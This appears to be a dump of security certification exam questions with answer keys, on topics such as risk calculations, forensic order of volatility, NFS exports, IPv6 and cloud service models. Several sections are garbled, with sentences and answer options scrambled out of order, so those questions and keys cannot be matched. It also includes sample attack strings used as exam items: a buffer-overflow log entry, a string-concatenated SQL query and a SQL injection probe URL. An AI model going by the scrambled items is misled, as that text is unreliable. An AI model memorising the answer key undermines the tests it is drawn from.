2. Perform vulnerability scanning on a daily basis G. Which of the following hardening techniques should be applied to mitigate this specific issue from reoccurring? (Select TWO). Restrict VPN access for all mobile users C. a bootkit was discovered and it was trying to access external websites.81 3 packets Log 2: HTTP://www.743: %SEC-6-IPACCESSLOGS: list 10 denied 10.php? user=aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa aaaaaaaaaaaaaaaaaaaaaaa Log 3: Security Error Alert Event ID 50: The RDP protocol component X.encode ( req.getParameter("pwd") ) +" ` ". Vulnerabilities Buffer overflow SQL injection .company.encode ( req. a web developer. Restrict/disable TELNET access to network resources F. String query = "Select user_id FROM user_data WHERE user_name = ` " + oe.getParameter("userID") ) + " ` and user_password = ` " + oe.com/index. Group policy to limit web access B.5. reports performance issues with her laptop and is not able to access any network resources. Logs: Log 1: Feb 5 23:55:37.Hardware restrictions: Bluetooth disabled FireWire disabled WiFi adapter disabled Ann. Each log below was collected from various security devices compiled from a report through the company's security information and event management server.224 detected an error in the protocol stream and has disconnected the client Log 4: Encoder oe = new OracleEncoder (). After further investigation. Remove administrative access to local users E. A. Restrict/disable USB access Correct Answer: DG Section: Mixed Questions Explanation Explanation/Reference: QUESTION 156 A security manager looked at various logs while investigating a recent security breach in the data center from an external source. Remove full-disk encryption D.

ACL
XSS

Which of the following logs and vulnerabilities would MOST likely be related to the security breach? (Select TWO).

A. Log 1
B. Log 2
C. Log 3
D. Log 4
E. Buffer overflow
F. ACL
G. XSS
H. SQL injection

Correct Answer: BE
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 157
A storage as a service company implements both encryption at rest as well as encryption in transit of customers' data. The security administrator is concerned with the
overall security of the encrypted customer data stored by the company servers and wants the development team to implement a solution that will strengthen the
customer's encryption key. Which of the following, if implemented, will MOST increase the time an offline password attack against the customers' data would take?

A. key = NULL ; for (int i=0; i<5000; i++) { key = sha(key + password) }
B. password = NULL ; for (int i=0; i<10000; i++) { password = sha256(key) }
C. password = password + sha(password+salt) + aes256(password+salt)
D. key = aes128(sha256(password), password)

Correct Answer: A
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 158
After reviewing a company's NAS configuration and file system access logs, the auditor is advising the security administrator to implement additional security controls on
the NFS export. The security administrator decides to remove the no_root_squash directive from the export and add the nosuid directive. Which of the following is true
about the security controls implemented by the security administrator?

A. The newly implemented security controls are in place to ensure that NFS encryption can only be controlled by the root user.
B. Removing the no_root_squash directive grants the root user remote NFS read/write access to important files owned by root on the NAS.
C. Users with root access on remote NFS client computers can always use the SU command to modify other users' files on the NAS.
D. Adding the nosuid directive disables regular users from accessing files owned by the root user over NFS even after using the SU command.

Correct Answer: C
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 159
An IT auditor is reviewing the data classification for a sensitive system. The company has classified the data stored in the sensitive system according to the following
matrix:

DATA TYPE        CONFIDENTIALITY   INTEGRITY   AVAILABILITY
-----------------------------------------------------------
Financial        HIGH              HIGH        LOW
Client name      MEDIUM            MEDIUM      HIGH
Client address   LOW               MEDIUM      LOW
-----------------------------------------------------------
AGGREGATE        MEDIUM            MEDIUM      MEDIUM

The auditor is advising the company to review the aggregate score and submit it to senior management. Which of the following should be the revised aggregate score?

A. HIGH, MEDIUM, LOW
B. MEDIUM, MEDIUM, LOW
C. HIGH, HIGH, HIGH
D. MEDIUM, MEDIUM, MEDIUM

Correct Answer: C
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 160
A security auditor suspects two employees of having devised a scheme to steal money from the company. While one employee submits purchase orders for personal
items, the other employee approves these purchase orders. The auditor has contacted the human resources director with suggestions on how to detect such illegal
activities. Which of the following should the human resource director implement to identify the employees involved in these activities and reduce the risk of this activity
occurring in the future?

A. Background checks
B. Job rotation
C. Least privilege
D. Employee termination procedures

Correct Answer: B
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 161
During an incident involving the company main database, a team of forensics experts is hired to respond to the breach. The team is in charge of collecting forensics
evidence from the company's database server. Which of the following is the correct order in which the forensics team should engage?

A. Notify senior management, secure the scene, capture volatile storage, capture non-volatile storage, implement chain of custody, and analyze original media.
B. Take inventory, secure the scene, capture RAM, capture hard drive, implement chain of custody, document, and analyze the data.
C. Implement chain of custody, take inventory, secure the scene, capture volatile and non- volatile storage, and document the findings.
D. Secure the scene, take inventory, capture volatile storage, capture non-volatile storage, document, and implement chain of custody.

Correct Answer: D
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 162
A security administrator has noticed that an increased number of employees' workstations are becoming infected with malware. The company deploys an enterprise
antivirus system as well as a web content filter, which blocks access to malicious web sites where malware files can be downloaded. Additionally, the company
implements technical measures to disable external storage. Which of the following is a technical control that the security administrator should implement next to reduce
malware infection?

A. Implement an Acceptable Use Policy which addresses malware downloads.
B. Deploy a network access control system with a persistent agent.
C. Enforce mandatory security awareness training for all employees and contractors.
D. Block cloud-based storage software on the company network.

Correct Answer: D
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 163
Company policy requires that all unsupported operating systems be removed from the network. The security administrator is using a combination of network based tools to
identify such systems for the purpose of disconnecting them from the network. Which of the following tools, or outputs from the tools in use, can be used to help the
security administrator make an approximate determination of the operating system in use on the local company network? (Select THREE).

A. Passive banner grabbing
B. Password cracker
C. http://www.company.org/documents_private/index.php?search=string#&topic=windows&tcp=packet%20capture&cookie=wokdjwalkjcnie61lkasdf2aliser4
D. 443/tcp open http
E. dig host.company.com
F. 09:18:16.262743 IP (tos 0x0, ttl 64, id 9870, offset 0, flags [none], proto TCP (6), length 40) 192.168.1.3.1051 > 10.46.3.7.80: Flags [none], cksum 0x1800 (correct), win 512, length 0
G. Nmap

Correct Answer: AFG
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 164
A new IT company has hired a security consultant to implement a remote access system, which will enable employees to telecommute from home using both company
issued as well as personal computing devices, including mobile devices. The company wants a flexible system to provide confidentiality and integrity for data in transit to
the company's internally developed application GUI. Company policy prohibits employees from having administrative rights to company issued devices. Which of the
following remote access solutions has the lowest technical complexity?

A. RDP server
B. Client-based VPN
C. IPSec
D. Jump box
E. SSL VPN

Correct Answer: A
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 165
The IT director has charged the company helpdesk with sanitizing fixed and removable media. The helpdesk manager has written a new procedure to be followed by the
helpdesk staff. This procedure includes the current standard to be used for data sanitization, as well as the location of physical degaussing tools. In which of the following
cases should the helpdesk staff use the new procedure? (Select THREE).

A. During asset disposal
B. While reviewing the risk assessment
C. While deploying new assets
D. Before asset repurposing

E. After the media has been disposed of
F. During the data classification process
G. When installing new printers
H. When media fails or is unusable

Correct Answer: ADH
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 166
Since the implementation of IPv6 on the company network, the security administrator has been unable to identify the users associated with certain devices
utilizing IPv6 addresses, even when the devices are centrally managed.

en1: flags=8863<UP,BROADCAST,SMART,RUNNING,SIMPLEX,MULTICAST> mtu 1500
    ether f8:1e:af:ab:10:a3
    inet6 fw80::fa1e:dfff:fee6:9d8%en1 prefixlen 64 scopeid 0x5
    inet 192.168.1.14 netmask 0xffffff00 broadcast 192.168.1.255
    inet6 2001:200:5:922:1035:dfff:fee6:9dfe prefixlen 64 autoconf
    inet6 2001:200:5:922:10ab:5e21:aa9a:6393 prefixlen 64 autoconf temporary
    nd6 options=1<PERFORMNUD>
    media: autoselect
    status: active

Given this output, which of the following protocols is in use by the company and what can the system administrator do to positively map users with IPv6
addresses in the future? (Select TWO).

A. The devices use EUI-64 format
B. The routers implement NDP
C. The network implements 6to4 tunneling
D. The router IPv6 advertisement has been disabled
E. The administrator must disable IPv6 tunneling
F. The administrator must disable the mobile IPv6 router flag
G. The administrator must disable the IPv6 privacy extensions
H. The administrator must disable DHCPv6 option code 1

Correct Answer: BG
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 167
ABC Corporation has introduced token-based authentication to system administrators due to the risk of password compromise. The tokens have a set of HMAC
counter-based codes and are valid until they are used. Which of the following types of authentication mechanisms does this statement describe?

A. TOTP
B. PAP
C. CHAP
D. HOTP

Correct Answer: D
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 168
A security manager is looking into the following vendor proposal for a cloud-based SIEM solution. The intention is that the cost of the SIEM solution will
be justified by having reduced the number of incidents and therefore saving on the amount spent investigating incidents.

Proposal: External cloud-based software as a service subscription costing $5,000 per month. Expected to reduce the number of current incidents per annum
by 50%. The company currently has ten security incidents per annum at an average cost of $10,000 per incident.

Which of the following is the ROI for this proposal after three years?

A. -$30,000
B. $120,000
C. $150,000
D. $180,000

Correct Answer: A
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 169
A software developer and IT administrator are focused on implementing security in the organization to protect OSI layer 7. Which of the following security
technologies would BEST meet their requirements? (Select TWO).

A. NIPS
B. HSM
C. HIPS
D. NIDS
E. WAF

Correct Answer: CE
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 170
The finance department for an online shopping website has discovered that a number of customers were able to purchase goods and services without any
payments. Further analysis conducted by the security investigations team indicated that the website allowed customers to update a payment amount for
shipping. A specially crafted value could be entered and cause a roll over, resulting in the shipping cost being subtracted from the balance and in some
instances resulted in a negative balance. As a result, the system processed the negative balance as zero dollars. Which of the following BEST describes
the application issue?

A. Race condition
B. Click-jacking
C. Integer overflow
D. Use after free
E. SQL injection

Correct Answer: C
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 171
A bank has decided to outsource some existing IT functions and systems to a third party service provider. The third party service provider will manage the
outsourced systems on their own premises and will continue to directly interface with the bank's other systems through dedicated encrypted links. Which of
the following is critical to ensure the successful management of system security concerns between the two organizations?

A. ISA
B. BIA
C. MOU
D. SOA
E. BPA

Correct Answer: A
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 172
An investigator wants to collect the most volatile data first in an incident to preserve the data that runs the highest risk of being lost. After memory,
which of the following BEST represents the remaining order of volatility that the investigator should follow?

A. File system information, swap files, network processes, system processes and raw disk blocks.
B. Raw disk blocks, network processes, system processes, swap files and file system information.
C. System processes, network processes, file system information, swap files and raw disk blocks.
D. Raw disk blocks, swap files, network processes, system processes, and file system information.

Correct Answer: C
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 173
A security architect has been engaged during the implementation stage of the SDLC to review a new HR software installation for security gaps. With the
project under a tight schedule to meet market commitments on project delivery, which of the following security activities should be prioritized by the
security architect? (Select TWO).

A. Perform penetration testing over the HR solution to identify technical vulnerabilities
B. Perform a security risk assessment with recommended solutions to close off high-rated risks
C. Secure code review of the HR solution to identify security gaps that could be exploited
D. Perform access control testing to ensure that privileges have been configured correctly
E. Determine if the information security standards have been complied with by the project

Correct Answer: BE
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 174
A company has noticed recently that its corporate information has ended up on an online forum. An investigation has identified that internal employees are
sharing confidential corporate information on a daily basis. Which of the following are the MOST effective security controls that can be implemented to
stop the above problem? (Select TWO).

A. Implement a URL filter to block the online forum
B. Implement NIDS on the desktop and DMZ networks
C. Security awareness compliance training for all employees
D. Implement DLP on the desktop, email gateway, and web proxies
E. Review of security policies and procedures

Correct Answer: CD
Section: Mixed Questions
Explanation

Explanation/Reference:

BIA C. Run a protocol analyzer perform static code analysis and vulnerability assessment Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 177 An insurance company has an online quoting system for insurance premiums. due to legacy systems. and static code analysis D. the following patterns were detected: Pattern 1 Analysis of the logs identifies that insurance premium forms are being filled in but only single fields are incrementally being updated. BPA B. It allows potential customers to fill in certain details about their car and obtain a quote. Which of the following security documents should be used to clarify the roles and responsibilities between the teams? A. Perform dynamic code analysis. OLA Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: QUESTION 176 A security services company is scoping a proposal with a client. They want to perform a general security audit of their environment within a two week period and consequently have the following requirements: Requirement 1 Ensure their server infrastructure operating systems are at their latest patch levels Requirement 2 Test the behavior between the application and database Requirement 3 Ensure that customer data can not be exfiltrated Which of the following is the BEST solution to meet the above requirements? A. Pattern 2 For every quote completed. MOU D. dynamic code analysis. penetration test and run a vulnerability scanner C. . perform social engineering and run a vulnerability scanner B. Penetration test. During an investigation.QUESTION 175 An employee is performing a review of the organization's security functions and noticed that there is some cross over responsibility between the IT security team and the financial fraud team. a new customer number is created. and what is the BEST way to defend against it? (Select TWO). customer numbers are running out. Which of the following is the attack type the system is susceptible to. 
Conduct network analysis.

Cross site scripting attack C. Which of the following BEST maximizes the protection of these systems from malicious software? A. SQL injection D. Apply a hidden field that triggers a SIEM alert B. Implement firewall rules to block the attacking IP addresses Correct Answer: CF Section: Mixed Questions Explanation Explanation/Reference: QUESTION 178 A security tester is testing a website and performs the following manual query: https://www. SQL injection F.jsp?products=5%20and%201=1 The following response is received in the payload: "ORA-000001: SQL command not properly ended" Which of the following is the response an example of? A. Input a blacklist of all known BOT malware IPs into the firewall E.A.com/cookies. Implement an inline WAF and integrate into SIEM G.comptia. Configure the host firewall to ensure only the necessary applications have listening ports Correct Answer: C . Distributed denial of service H. Configure the systems to ensure only necessary applications are able to run D. Resource exhaustion attack D. Configure a separate zone for the systems and restrict access to known ports C. Cross-site scripting C. Privilege escalation Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 179 An organization has several production critical SCADA supervisory systems that cannot follow the normal 30-day patching policy. Configure a firewall with deep packet inspection that restricts traffic to the systems B. Fingerprinting B.

Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 180
An administrator believes that the web servers are being flooded with excessive traffic from time to time. The administrator suspects that these traffic
floods correspond to when a competitor makes major announcements. Which of the following should the administrator do to prove this theory?

A. Implement data analytics to try and correlate the occurrence times.
B. Implement a honey pot to capture traffic during the next attack.
C. Configure the servers for high availability to handle the additional bandwidth.
D. Log all traffic coming from the competitor's public IP addresses.

Correct Answer: A
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 181
A trucking company delivers products all over the country. The executives at the company would like to have better insight into the location of their
drivers to ensure the shipments are following secure routes. Which of the following would BEST help the executives meet this goal?

A. Install GSM tracking on each product for end-to-end delivery visibility.
B. Implement geo-fencing to track products.
C. Equip each truck with an RFID tag for location services.
D. Require drivers to geo-tag documentation at each delivery location.

Correct Answer: B
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 182
A company has adopted a BYOD program. The company would like to protect confidential information. However, it has been decided that when an employee
leaves, the company will not completely wipe the personal device. Which of the following would MOST likely help the company maintain security when
employees leave?

A. Require cloud storage on corporate servers and disable access upon termination
B. Whitelist access to only non-confidential information
C. Utilize an MDM solution with containerization
D. Require that devices not have local storage

Correct Answer: C
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 183
An organization uses IP address block 203.0.113.0/24 on its internal network. At the border router, the network administrator sets up rules to deny packets
with a source address in this subnet from entering the network, and to deny packets with a destination address in this subnet from leaving the network.
Which of the following is the administrator attempting to prevent?

A. BGP route hijacking attacks
B. Bogon IP network traffic
C. IP spoofing attacks
D. Man-in-the-middle attacks
E. Amplified DDoS attacks

Correct Answer: C
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 184
Using SSL, an administrator wishes to secure public facing server farms in three subdomains: dc1.east.company.com, dc2.central.company.com, and
dc3.west.company.com. Which of the following is the number of wildcard SSL certificates that should be purchased?

A. 0
B. 1
C. 3
D. 6

Correct Answer: C
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 185
A security administrator is assessing a new application. The application uses an API that is supposed to encrypt text strings that are stored in memory.
How might the administrator test that the strings are indeed encrypted in memory?

A. Use fuzzing techniques to examine application inputs
B. Run nmap to attach to application memory
C. Use a packet analyzer to inspect the strings
D. Initiate a core dump of the application
E. Use an HTTP interceptor to capture the text strings

Correct Answer: D
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 186
An international shipping company discovered that deliveries left idle are being tampered with. The company wants to reduce the idle time associated with
international deliveries by ensuring that personnel are automatically notified when an inbound delivery arrives at the transit dock. Which of the following
should be implemented to help the company increase the security posture of its operations?

A. Back office database
B. Asset tracking
C. Geo-fencing
D. Barcode scanner

Correct Answer: C
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 187
The telecommunications manager wants to improve the process for assigning company-owned mobile devices and ensuring data is properly removed when no longer
needed. Additionally, the manager wants to onboard and offboard personally owned mobile devices that will be used in the BYOD initiative. Which of the
following should be implemented to ensure these processes can be automated? (Select THREE).

A. SIM's PIN
B. Remote wiping
C. Chargeback system
D. MDM software
E. Presence software
F. Email profiles
G. Identity attestation
H. GPS tracking

Correct Answer: BDG
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 188
The risk manager at a small bank wants to use quantitative analysis to determine the ALE of running a business system at a location which is subject to
fires during the year. A risk analyst reports to the risk manager that the asset value of the business system is $120,000 and, based on industry data, the
exposure factor to fires is only 20% due to the fire suppression system installed at the site. Fires occur in the area on average every four years. Which
of the following is the ALE?

A. $6,000
B. $24,000
C. $30,000
D. $120,000

Correct Answer: A
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 189
An accountant at a small business is trying to understand the value of a server to determine if the business can afford to buy another server for DR. The
risk manager only provided the accountant with the SLE of $24,000, ARO of 20% and the exposure factor of 25%. Which of the following is the correct asset
value calculated by the accountant?

A. $4,800
B. $24,000
C. $96,000
D. $120,000

Correct Answer: C
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 190
A risk manager has decided to use likelihood and consequence to determine the risk of an event occurring to a company asset. Which of the following is a
limitation of this approach to risk management?

A. Subjective and based on an individual's experience.
B. Requires a high degree of upfront work to gather environment details.
C. Difficult to differentiate between high, medium, and low risks.
D. Allows for cost and benefit analysis.
E. Calculations can be extremely complex to manage.

Correct Answer: A
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 191
An administrator is implementing a new network-based storage device. In selecting a storage protocol, the administrator would like the data in transit's
integrity to be the most important concern. Which of the following protocols meets these needs by implementing either AES-CMAC or HMAC-SHA256 to sign data?

A. SMB
B. NFS
C. FCoE
D. iSCSI

Correct Answer: A
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 192
A security administrator is tasked with increasing the availability of the storage networks while enhancing the performance of existing applications. Which
of the following technologies should the administrator implement to meet these goals? (Select TWO).

A. LUN masking
B. Snapshots
C. vSAN
D. Dynamic disk pools
E. Multipath
F. Deduplication

Correct Answer: DE
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 193
A system administrator has just installed a new Linux distribution. The distribution is configured to be "secure out of the box". The system administrator
cannot make updates to certain system files and services. Each time changes are attempted, they are denied and a system error is generated. Which of the
following troubleshooting steps should the security administrator suggest?

A. Review settings in the SELinux configuration files
B. Reset root permissions on systemd files
C. Perform all administrative actions while logged in as root
D. Disable any firewall software before making changes

Correct Answer: A
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 194
A security solutions architect has argued consistently to implement the most secure method of encrypting corporate messages. The solution has been derided
as not being cost effective by other members of the IT department. The proposed solution uses symmetric keys to encrypt all messages and is very resistant
to unauthorized decryption. The method also requires special handling and security for all key material that goes above and beyond most encryption systems.
Which of the following is the solutions architect MOST likely trying to implement?

A. One time pads
B. PKI
C. Quantum cryptography
D. Digital rights management

Correct Answer: A
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 195
A critical system audit shows that the payroll system is not meeting security policy due to missing OS security patches. Upon further review, it appears
that the system is not being patched at all. The vendor states that the system is only supported on the current OS patch level. Which of the following
compensating controls should be used to mitigate the vulnerability of missing OS patches on this system?

A. Isolate the system on a secure network to limit its contact with other systems
B. Implement an application layer firewall to protect the payroll system interface
C. Monitor the system's security log for unauthorized access to the payroll application
D. Perform reconciliation of all payroll transactions on a daily basis

Correct Answer: A
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 196
ODBC access to a database on a network-connected host is required. The host does not have a security mechanism to authenticate the incoming ODBC
connection, and the application requires that the connection have read/write permissions. In order to further secure the data, a nonstandard configuration
would need to be implemented. The information in the database is not sensitive, but was not readily accessible prior to the implementation of the ODBC
connection. Which of the following actions should be taken by the security analyst?

A. Accept the risk in order to keep the system within the company's standard security configuration.
B. Explain the risks to the data owner and aid in the decision to accept the risk versus choosing a nonstandard solution.
C. Secure the data despite the need to use a security control or solution that is not within company standards.
D. Do not allow the connection to be made to avoid unnecessary risk and avoid deviating from the standard security configuration.

Correct Answer: B
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 197
A project manager working for a large city government is required to plan and build a WAN, which will be required to host official business and public
access. It is also anticipated that the city's emergency and first response communication systems will be required to operate across the same network. The
project manager has experience with enterprise IT projects, but feels this project has an increased complexity as a result of the mixed business / public
use and the critical infrastructure it will provide. Which of the following should the project manager release to the public, academia, and private
industry to ensure the city provides due care in considering all project factors prior to building its new WAN?

A. NDA
B. RFI
C. RFP
D. RFQ

Correct Answer: B
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 198
In a situation where data is to be recovered from an attacker's location, which of the following are the FIRST things to capture? (Select TWO).

A. Removable media
B. Passwords written on scrap paper
C. Snapshots of data on the monitor
D. Documents on the printer
E. Volatile system memory
F. System hard drive

Correct Answer: CE
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 199
An information security assessor for an organization finished an assessment that identified critical issues with the human resource new employee
management software application. The assessor submitted the report to senior management but nothing has happened. Which of the following would be a
logical next step?

A. Craft an RFP to begin finding a new human resource application.
B. Include specific case studies from other organizations in an updated report.
C. Schedule a meeting with key human resource application stakeholders.
D. Meet the two key VPs and request a signature on the original assessment.

Correct Answer: C
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 200
An IT Manager is concerned about errors made during the deployment process for a new model of tablet. Which of the following would suggest best practices
and configuration parameters that technicians could follow during the deployment process?

A. Automated workflow
B. Procedure
C. Corporate standard
D. Guideline
E. Policy

Correct Answer: D
Section: Mixed Questions

Explanation

Explanation/Reference:

QUESTION 201
An IT manager is concerned about the cost of implementing a web filtering solution in an effort to mitigate the risks associated with malware and resulting
data leakage. Given that the ARO is twice per year, the ALE resulting from a data leak is $25,000 and the ALE after implementing the web filter is $15,000.
The web filtering solution will cost the organization $10,000 per year. Which of the following values is the single loss expectancy of a data leakage event
after implementing the web filtering solution?

A. $0
B. $7,500
C. $10,000
D. $12,500
E. $15,000

Correct Answer: B
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 202
An IT manager is working with a project manager to implement a new ERP system capable of transacting data between the new ERP system and the legacy system.
As part of this process, both parties must agree to the controls utilized to secure data connections between the two enterprise systems. This is commonly
documented in which of the following formal documents?

A. Memorandum of Understanding
B. Information System Security Agreement
C. Interconnection Security Agreement
D. Interoperability Agreement
E. Operating Level Agreement

Correct Answer: C
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 203
A facilities manager has observed varying electric use on the company's metered service lines. The facility management rarely interacts with the IT
department unless new equipment is being delivered. However, the facility manager thinks that there is a correlation between spikes in electric use and IT
department activity. Which of the following business processes and/or practices would provide better management of organizational resources with the IT
department's needs? (Select TWO).

A. Deploying a radio frequency identification tagging asset management system
B. Designing a business resource monitoring system
C. Hiring a property custodian
D. Purchasing software asset management software
E. Facility management participation on a change control board
F. Rewriting the change board charter
G. Implementation of change management best practices

Correct Answer: EG
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 204
A company has a difficult time communicating between the security engineers, application developers, and sales staff. The sales staff tends to overpromise
the application deliverables. The security engineers and application developers are falling behind schedule. Which of the following should be done to solve
this?

A. Allow the sales staff to shadow the developers and engineers to see how their sales impact the deliverables.
B. Allow the security engineering team to do application development so they understand why it takes so long.
C. Allow the application developers to attend a sales conference so they understand how business is done.
D. Allow the sales staff to learn application programming and security engineering so they understand the whole lifecycle.

Correct Answer: A
Section: Mixed Questions
Explanation

Explanation/Reference:

QUESTION 205
The DLP solution has been showing some unidentified encrypted data being sent using FTP to a remote server. A vulnerability scan found a collection of
Linux servers that are missing OS level patches. Upon further investigation, a technician notices that there are a few unidentified processes running on a
number of the servers. What would be a key FIRST step for the data security team to undertake at this point?

A. Capture process ID data and submit to anti-virus vendor for review.
B. Reboot the Linux servers, check running processes, and install needed patches.
C. Remove a single Linux server from production and place in quarantine.
D. Notify upper management of a security breach.
E. Conduct a bit level image, including RAM, of one or more of the Linux servers.

Correct Answer: E
Section: Mixed Questions
Explanation

Which of the following actions would protect the external network interfaces from external attackers performing network scanning? A. D. A public SaaS D. Implement change control practices at the organization level. Update the vulnerability management plan to address data discrepancy issues. The development team has direct access to the production servers and is most likely the cause of the different release versions. Which of the following process level solutions would address this problem? A. A public IaaS B. C. A public PaaS C. Filter all internal ICMP message traffic. forcing attackers to use full-blown TCP port scans against external network interfaces. B. Which of the following solutions should be recommended? A. the management of a small candy company wishes to explore a cloud service option for the development of its online applications. Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 208 In an effort to minimize costs. Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 207 A senior network security engineer has been tasked to decrease the attack surface of the corporate network. The company does not wish to invest heavily in IT infrastructure. it has been determined that there are version mismatches of key e-commerce applications on the production web servers. Remove contact details from the domain name registrar to prevent social engineering attacks.Explanation/Reference: QUESTION 206 Customers have recently reported incomplete purchase history and other anomalies while accessing their account history on the web server farm. Test external interfaces to see how they function when they process fragmented IP packets. B. C. Enable a honeynet to capture and facilitate future analysis of malicious attack vectors. D. Upon investigation. Change development methodology from strict waterfall to agile. A private SaaS . 
Adjust the firewall ACL to prohibit development from directly accessing the production server farm.

Which of the following meets these requirements? A. The requirements are: 1. ACL on routing equipment Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: QUESTION 210 A small company is developing a new Internet-facing web application. 2. Each lab must be on a separate network segment. C. and programming courses. . 4. A private PaaS Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 209 An educational institution would like to make computer labs available to remote students. Student devices must have network access. SAML for federated authentication. 6. ACLs on network equipment D. Passwords must not be stored in the code. RADIUS for authentication. Which of the following components should be used to achieve the design in conjunction with directory services? A.E. 3. Use OpenID and allow a third party to authenticate users. 3. B. 2. Use SAML with federated directory services. 5. not simple access to hosts on the lab networks. A private IaaS F. L2TP VPN over TLS for remote connectivity. but not other lab networks. Servers must have a private certificate installed locally to provide assurance to the students. security. D. firewalls between each lab segment B. Cloud service remote access tool for remote connectivity. SSL VPN for remote connectivity. Use TLS with a shared client certificate for all users. ACLs on routing equipment C. Use Kerberos and browsers that support SAML. IPSec VPN with mutual authentication for remote connectivity. All students must use the same VPN connection profile. directory services groups for each lab group. Users of the web application will not be added to the company's directory services. OAuth for authentication. Labs must have access to the Internet. The security requirements are: 1. The labs are used for various IT networking. Users of the web application must be uniquely identified and authenticated. Students must have a private certificate installed before gaining access.

Which of the following designs is MOST appropriate for this scenario? A. Insider threat B. Deploy a branch location Read-Only Domain Controller in the DMZ at the main campus with a two-way trust. The branch location does not have a datacenter. and the physical security posture of the building is weak. Deploy a corporate Domain Controller in the DMZ at the main campus. Which of the following could the company view as a downside of using presence technology? A. Physical security D.Correct Answer: A Section: Mixed Questions Explanation Explanation/Reference: QUESTION 211 A company is trying to decide how to manage hosts in a branch location connected via a slow WAN link. The company desires to provide the same level of performance and functionality to the branch office as it provides to the main campus. D. The company uses Active Directory for its directory service and host configuration management. C. F. Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 212 A multi-national company has a highly mobile workforce and minimal IT infrastructure. Industrial espionage Correct Answer: C Section: Mixed Questions Explanation Explanation/Reference: . B. As a result of the dispersed employees and frequent international travel. Deploy a corporate Read-Only Domain Controller to the branch location. Network reconnaissance C. Deploy a branch location Read-Only Domain Controller to the branch office location with a one-way trust. Deploy a corporate Domain Controller to the branch location. the company is concerned about the safety of employees and their families when moving in and out of certain countries. The company utilizes a BYOD and social media policy to integrate presence technology into global collaboration tools by individuals and teams. Deploy a branch location Domain Controller to the branch location with a one-way trust. E.

while customer acceptance testing will be performed in house. Information digest G. Acceptance testing F. User requirements C. End to end network encryption Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 215 The IT Security Analyst for a small organization is working on a customer's system and identifies a possible intrusion in a database that contains PII. ISP to ISP network jitter D.QUESTION 213 A finance manager says that the company needs to ensure that the new system can "replay" data. for every exchange being tracked by the investment departments. the analyst wants to get the issue addressed as soon as possible. The project manager is responsible for a new software development effort that is being outsourced overseas. Data elements D. File-size validation E. up to the minute. . Shut down the production network interfaces on the server and change all of the DBMS account passwords. Source code vulnerability scanning B. Which of the following capabilities is MOST likely to cause issues with network availability? A. Time-based access control lists C. Compliance standards B. Contact the local authorities so an investigation can be started as quickly as possible. Since PII is involved. Which of the following is the FIRST step the analyst should take in mitigating the impact of the potential intrusion? A. How would a security engineer BEST interpret the finance manager's needs? A. Data storage E. B. System requirements Correct Answer: B Section: Mixed Questions Explanation Explanation/Reference: QUESTION 214 An IT manager is working with a project manager from another subsidiary of the same multinational organization. The finance manager also states that the company's transactions need to be tracked against this data for a period of five years for compliance.

